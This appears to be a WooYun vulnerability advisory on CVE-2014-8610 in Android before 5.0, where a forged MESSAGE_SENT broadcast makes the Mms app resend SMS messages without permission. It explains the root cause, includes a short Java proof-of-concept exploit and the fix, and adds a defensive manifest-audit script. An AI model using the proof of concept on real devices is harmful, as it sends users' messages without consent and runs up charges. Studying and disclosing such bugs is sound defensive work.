CVE-2014-8610 Android < 5.0 SMS resend vulnerability (WOOYUN)

Category: WooYun-Zone

瘦蛟舞 (popularizing security knowledge is a public good) | 2014-11-26 16:01

### Affected versions

Android < 5.0

### IDs

CVE-2014-8610
Android bug id 17671795

### Impact

Resending SMS messages, causing unwanted charges.
By forging a message in the drafts folder, an app can send arbitrary SMS messages without holding the SEND_SMS permission.

### Root cause

A textbook case of an exposed broadcast receiver component combined with broadcast forgery.

Vulnerable file: https://android.googlesource.com/platform/packages/apps/Mms/+/android-4.4.4_r2.0.1/src/com/android/mms/transaction/SmsReceiverService.java

Vulnerable component: .transaction.SmsReceiver

Forging the broadcast `com.android.mms.transaction.MESSAGE_SENT` causes the `handleSmsSent` callback to run. If the malicious app sets the forged broadcast's result code to RESULT_ERROR_RADIO_OFF, execution enters the code path below: the SMS at the given URI is moved to the outgoing queue, and the messages in your drafts folder are sent without your knowledge.

Key code:

```java
private void handleSmsSent(Intent intent, int error) {
    ...
    } else if ((mResultCode == SmsManager.RESULT_ERROR_RADIO_OFF) ||
            (mResultCode == SmsManager.RESULT_ERROR_NO_SERVICE)) {
        if (Log.isLoggable(LogTag.TRANSACTION, Log.VERBOSE)) {
            Log.v(TAG, "handleSmsSent: no service, queuing message w/ uri: " + uri);
        }
        // We got an error with no service or no radio. Register for state changes so
        // when the status of the connection/radio changes, we can try to send the
        // queued up messages.
        registerForServiceStateChanges();
        // We couldn't send the message, put in the queue to retry later.
        Sms.moveMessageToFolder(this, uri, Sms.MESSAGE_TYPE_QUEUED, error);
    ...
```

### PoC

```java
Intent intent = new Intent("com.android.mms.transaction.MESSAGE_SENT");
intent.setData(Uri.parse("content://sms"));
intent.setClassName("com.android.mms", "com.android.mms.transaction.SmsReceiver");
sendOrderedBroadcast(intent, null, null, null, SmsManager.RESULT_ERROR_RADIO_OFF, null, null);

/**
 Some tips about the PoC:
 1. The URI is content://sms without specifying an ID, which means all the SMS will be resent.
 2. It must be an explicit intent.
 3. With this version of sendOrderedBroadcast, the initial result code can be controlled.
 **/
```

### Fix

The broadcast receiver .transaction.SmsReceiver now requires the android.permission.SEND_SMS permission.

```xml
<receiver android:name=".transaction.SmsReceiver" android:permission="android.permission.SEND_SMS">
```

https://android.googlesource.com/platform/packages/apps/Mms/+/008d6202fca4002a7dfe333f22377faa73585c67
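The root cause above (an exported receiver with no permission guard) and the fix (adding android:permission) are the kind of thing a manifest audit should catch. The following is an added example, not code from the advisory or from AOSP: a small Python check that flags exported receivers lacking a permission, run over constructed manifest fragments that model the receiver before and after the fix (the fragments are assumptions, not the real Mms manifest).

```python
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"

def _attr(elem, name):
    """Read an android:-namespaced attribute, or None if absent."""
    return elem.get("{%s}%s" % (ANDROID_NS, name))

def audit_receivers(manifest_xml):
    """Return names of <receiver> components that other apps can reach
    (exported) but that declare no android:permission guard. An explicit
    intent (setClassName) skips intent-filter matching, so only the exported
    flag and the permission attribute stand between a foreign app and it."""
    root = ET.fromstring(manifest_xml)
    findings = []
    for recv in root.iter("receiver"):
        exported = _attr(recv, "exported")
        if exported is None:
            # Platform default: a receiver with at least one intent-filter is
            # exported; a receiver without any filter is private to the app.
            is_exported = recv.find("intent-filter") is not None
        else:
            is_exported = exported.lower() == "true"
        if is_exported and not _attr(recv, "permission"):
            findings.append(_attr(recv, "name"))
    return findings

# Constructed manifest fragments modelled on the receiver this advisory
# describes; they are NOT the real AOSP Mms manifest.
_FILTER = """<intent-filter>
        <action android:name="com.android.mms.transaction.MESSAGE_SENT"/>
      </intent-filter>"""
_TEMPLATE = """<manifest xmlns:android="%s" package="com.android.mms">
  <application>
    <receiver android:name=".transaction.SmsReceiver"%s>
      %s
    </receiver>
  </application>
</manifest>"""
MANIFEST_BEFORE = _TEMPLATE % (ANDROID_NS, "", _FILTER)
MANIFEST_AFTER = _TEMPLATE % (
    ANDROID_NS, ' android:permission="android.permission.SEND_SMS"', _FILTER)

if __name__ == "__main__":
    print("before fix:", audit_receivers(MANIFEST_BEFORE))  # ['.transaction.SmsReceiver']
    print("after fix: ", audit_receivers(MANIFEST_AFTER))   # []
```

Run it against a decoded AndroidManifest.xml (for example from apktool output) to list every receiver a third-party app can target; each hit needs either a permission or android:exported="false".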

Original article: http://xteam.baidu.com/?p=164
